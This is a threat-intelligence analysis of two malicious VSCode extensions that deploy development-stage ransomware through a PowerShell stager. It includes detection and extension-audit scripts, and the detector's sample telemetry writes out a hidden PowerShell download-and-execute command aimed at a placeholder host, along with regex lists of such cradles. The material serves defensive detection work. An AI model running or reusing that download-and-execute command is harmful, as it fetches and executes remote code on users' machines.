Full Report
Cybersecurity researchers have uncovered two malicious extensions in the Visual Studio Code (VSCode) Marketplace that are designed to deploy ransomware that's under development to its users. The extensions, named "ahban.shiba" and "ahban.cychelloworld," have since been taken down by the marketplace maintainers. Both the extensions, per ReversingLabs, incorporate code that's designed to invoke a
Analysis Summary
# Tool/Technique: ahban.shiba and ahban.cychelloworld VSCode Extensions
## Overview
These are two malicious extensions discovered in the Visual Studio Code (VSCode) Marketplace that deploy early-stage ransomware to users' systems. Both have since been removed by the marketplace maintainers.
## Technical Details
- Type: Malware / Malicious Tool (VSCode Extension)
- Platform: Windows (inferred from the PowerShell stager and the `%USERPROFILE%\Desktop` target path).
- Capabilities: Initial execution via extension activation, downloading and executing a secondary PowerShell payload from a C2 server, file encryption, and displaying a ransom note.
- First Seen: Context implies detection around March 24, 2025.
## MITRE ATT&CK Mapping
The behaviour described maps to initial access, execution, command and control, and impact tactics:
- **TA0001 - Initial Access**
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain (malicious extensions published to the VSCode Marketplace)
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell (extension activation launches a PowerShell stager)
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (the stager downloads the second-stage payload from the C2 server)
- **TA0040 - Impact**
- T1486 - Data Encrypted for Impact (files in the target folder are encrypted and a ransom note is shown)
## Functionality
### Core Capabilities
- Installation via VSCode Marketplace.
- Upon activation, the extension invokes a PowerShell command to retrieve a payload from a Command and Control (C2) server.
- The downloaded payload executes and targets files specifically within the `%USERPROFILE%\Desktop\testShiba` folder for encryption.
- Displays a rudimentary ransom note: "Your files have been encrypted. Pay 1 ShibaCoin to ShibaWallet to recover them."
### Advanced Features
- The described ransomware functionality appears to be in **early-stage development**, indicated by the limited scope of encryption (only the "testShiba" folder) and the lack of actionable recovery instructions (no concrete wallet address or detailed steps).
- Utilizes a staged approach (Extension -> PowerShell download -> Payload execution).
## Indicators of Compromise
- File Hashes: [Not Provided in Context]
- Extension IDs: `ahban.shiba`, `ahban.cychelloworld` (marketplace publisher `ahban`)
- Registry Keys: [Not Provided in Context]
- Network Indicators: the C2 server hosting the PowerShell payload [URL/IP not provided in context]
- Behavioral Indicators: PowerShell launched by the VSCode extension host process, a download of a remote script from the C2 server, and encryption of files confined to the `testShiba` folder on the user's desktop, followed by the ransom-note text above.
## Associated Threat Actors
- Not named. The only attribution available is the marketplace publisher ID `ahban` under which both extensions were published.
## Detection Methods
- **Signature-based detection:** Block or alert on the C2 URL/IP hosting the PowerShell payload once it is published, and on the extension IDs `ahban.shiba` and `ahban.cychelloworld` in extension inventories.
- **Behavioral detection:** Alert when a VSCode extension host process spawns PowerShell with a download-and-execute command line (for example `Invoke-WebRequest`, `DownloadString` or `IEX` pointing at a remote URL), and when that child then writes encrypted files and a ransom note into user-profile directories. A PowerShell child of VSCode on its own is noisy (the integrated terminal and many legitimate extensions spawn one), so the remote download and file-modification steps should be required before alerting.
- **YARA rules:** A rule on the ransom-note string "Your files have been encrypted. Pay 1 ShibaCoin to ShibaWallet to recover them." and on the `testShiba` path will match this development build; expect both to change as the ransomware matures.
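The behavioral rule above, as an added example that is not from ReversingLabs or the original report: a Python detector run over constructed process-creation records (Sysmon Event ID 1 / Security 4688 fields). It assumes the extension host runs as a `Code.exe` process whose command line contains `--type=extensionHost`, which is how it is told apart from PowerShell launched by the integrated terminal; the command lines, paths and the `c2.invalid` host are constructed for the demonstration, and none of the regexes are taken from the real payload.

```python
"""Detect PowerShell download cradles spawned by the VS Code extension host.

Added example: a behavioural rule over process-creation telemetry
(Sysmon Event ID 1 / Security 4688 style). The sample events below are
constructed, not captured from the real extensions.
"""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class ProcessCreate:
    utc_time: str
    parent_image: str
    parent_command_line: str
    image: str
    command_line: str


VSCODE_IMAGES = {"code.exe", "code - insiders.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Download-and-execute primitives commonly seen in PowerShell stagers.
CRADLE_PATTERNS = {
    "web_request": re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|\bcurl\b|\bwget\b", re.I),
    "webclient": re.compile(r"net\.webclient|downloadstring|downloadfile", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded_command": re.compile(r"\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
# Flags that hide the window or disable policy; they raise severity when present.
EVASION_PATTERNS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def from_extension_host(ev: ProcessCreate) -> bool:
    """Assumption: the extension host is a Code.exe process started with
    --type=extensionHost; the integrated terminal's shell has a different parent."""
    return (_basename(ev.parent_image) in VSCODE_IMAGES
            and "--type=extensionhost" in ev.parent_command_line.lower())


def score_event(ev: ProcessCreate) -> Optional[dict]:
    """Return an alert for an extension-host -> PowerShell download cradle, else None."""
    if _basename(ev.image) not in POWERSHELL_IMAGES or not from_extension_host(ev):
        return None
    cradle = [n for n, p in CRADLE_PATTERNS.items() if p.search(ev.command_line)]
    if not cradle:
        return None  # PowerShell from the extension host alone is too noisy to alert on
    evasion = [n for n, p in EVASION_PATTERNS.items() if p.search(ev.command_line)]
    return {
        "time": ev.utc_time,
        "cradle": cradle,
        "evasion": evasion,
        "urls": URL_RE.findall(ev.command_line),
        "severity": "high" if evasion else "medium",
    }


def detect(events: List[ProcessCreate]) -> List[dict]:
    return [a for a in (score_event(e) for e in events) if a is not None]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CODE = r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"

# Constructed sample telemetry (hostnames use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    # 1. Extension host launches a hidden stager that pulls a second-stage script.
    ProcessCreate("2025-03-24 10:01:02", CODE, "Code.exe --type=extensionHost", PS,
                  "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://c2.invalid/stage2.ps1')\""),
    # 2. Integrated terminal: same binary, but the parent is the pty host and a user typed this.
    ProcessCreate("2025-03-24 10:05:40", CODE, "Code.exe --type=ptyHost", PS,
                  "powershell.exe -NoExit -Command \"Invoke-WebRequest https://example.invalid/notes.txt\""),
    # 3. Extension host runs a benign local script with no download primitive.
    ProcessCreate("2025-03-24 10:07:13", CODE, "Code.exe --type=extensionHost", PS,
                  "powershell.exe -NoProfile -Command \"Get-ChildItem -Recurse -Filter *.ps1\""),
    # 4. Cradle with an unrelated parent; out of scope for this rule.
    ProcessCreate("2025-03-24 10:09:55", r"C:\Windows\explorer.exe", "explorer.exe", PS,
                  "powershell.exe -c \"IEX (irm http://c2.invalid/x)\""),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only event 1 fires: it combines an extension-host parent, a download primitive and evasion flags, so it scores `high`. Events 2 and 3 show why the parent's `--type` argument and the cradle requirement both matter; without them the integrated terminal and harmless extension scripts would page an analyst every few minutes.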
## Mitigation Strategies
- **Prevention measures:** Thoroughly vet all extensions before installation, especially those with low download counts or unclear authorship, even if hosted on official marketplaces. Review extension permissions on install.
- **Hardening recommendations:** Apply application control (WDAC or AppLocker) so that only signed, approved scripts run; put PowerShell into Constrained Language Mode where full language access is not needed; enable PowerShell script block logging (Event ID 4104) and process-creation auditing with command-line capture so that a PowerShell download cradle launched from the VSCode extension host is recorded; and consider blocking or alerting on outbound connections from PowerShell processes whose parent is VSCode.
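The vetting step above, as an added example that is not the page's or ReversingLabs' code: a Python audit of the local extension inventory that flags the two reported extension IDs, extensions that activate without user action (`*` or `onStartupFinished` in `activationEvents`), and publishers outside an allowlist. It assumes the default `~/.vscode/extensions/<publisher>.<name>-<version>/package.json` layout; the three sample manifests are constructed for the demonstration and the `ms-python` allowlist entry is illustrative.

```python
"""Audit installed VS Code extensions for known-bad IDs and risky activation.

Added example, not ReversingLabs' or the page's code. Assumes the default
layout ~/.vscode/extensions/<publisher>.<name>-<version>/package.json.
"""
import json
import tempfile
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

# Extension IDs reported by ReversingLabs as malicious.
KNOWN_MALICIOUS = {"ahban.shiba", "ahban.cychelloworld"}
# Activation events that fire without the user opening a matching file or
# running a command (assumption for triage: these deserve a closer look).
AUTO_ACTIVATION = {"*", "onStartupFinished"}


def default_extensions_dir() -> Path:
    return Path.home() / ".vscode" / "extensions"


def load_manifests(ext_dir: Path) -> Iterator[Tuple[str, dict]]:
    """Yield (folder name, parsed package.json) for every extension folder."""
    for manifest in sorted(ext_dir.glob("*/package.json")):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, do not crash the audit
        if isinstance(data, dict):
            yield manifest.parent.name, data


def extension_id(data: dict) -> str:
    return f"{data.get('publisher', '')}.{data.get('name', '')}".lower()


def audit(ext_dir: Path, allowed_publishers: frozenset = frozenset()) -> List[Dict]:
    """Return one finding per extension that trips at least one check."""
    findings = []
    for folder, data in load_manifests(ext_dir):
        reasons = []
        ext_id = extension_id(data)
        if ext_id in KNOWN_MALICIOUS:
            reasons.append("known-malicious")
        events = data.get("activationEvents") or []
        if isinstance(events, list) and AUTO_ACTIVATION & set(events):
            reasons.append("auto-activation")
        if allowed_publishers and data.get("publisher", "").lower() not in allowed_publishers:
            reasons.append("publisher-not-allowlisted")
        if reasons:
            findings.append({"id": ext_id, "folder": folder, "reasons": reasons})
    return findings


def build_sample_dir() -> Path:
    """Constructed sample: three fake extension folders in a temp directory."""
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-audit-"))
    manifests = {
        "ahban.shiba-0.0.1": {"publisher": "ahban", "name": "shiba", "activationEvents": ["*"]},
        "ms-python.python-2025.2.0": {"publisher": "ms-python", "name": "python",
                                      "activationEvents": ["onLanguage:python"]},
        "someone.helper-1.0.0": {"publisher": "someone", "name": "helper",
                                 "activationEvents": ["onStartupFinished"]},
    }
    for folder, data in manifests.items():
        (root / folder).mkdir()
        (root / folder / "package.json").write_text(json.dumps(data), encoding="utf-8")
    return root


if __name__ == "__main__":
    # Runs against the constructed sample; point it at default_extensions_dir()
    # with your own publisher allowlist to audit a real machine.
    for finding in audit(build_sample_dir(), allowed_publishers=frozenset({"ms-python"})):
        print(finding)
```

The known-bad check is the cheap win today; the activation and publisher checks are what catch the next `ahban` before a denylist exists, since an extension with no reason to run at startup that nevertheless declares `*` is exactly the shape of a stager that needs to fire without user interaction.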
## Related Tools/Techniques
- **Prior Supply Chain Incidents:** Mention of other malicious extensions masquerading as Zoom and a malicious Maven package impersonating `scribejava-core`.
- **Techniques:** Typosquatting (used by the related Maven package) is a common supply chain initial compromise vector.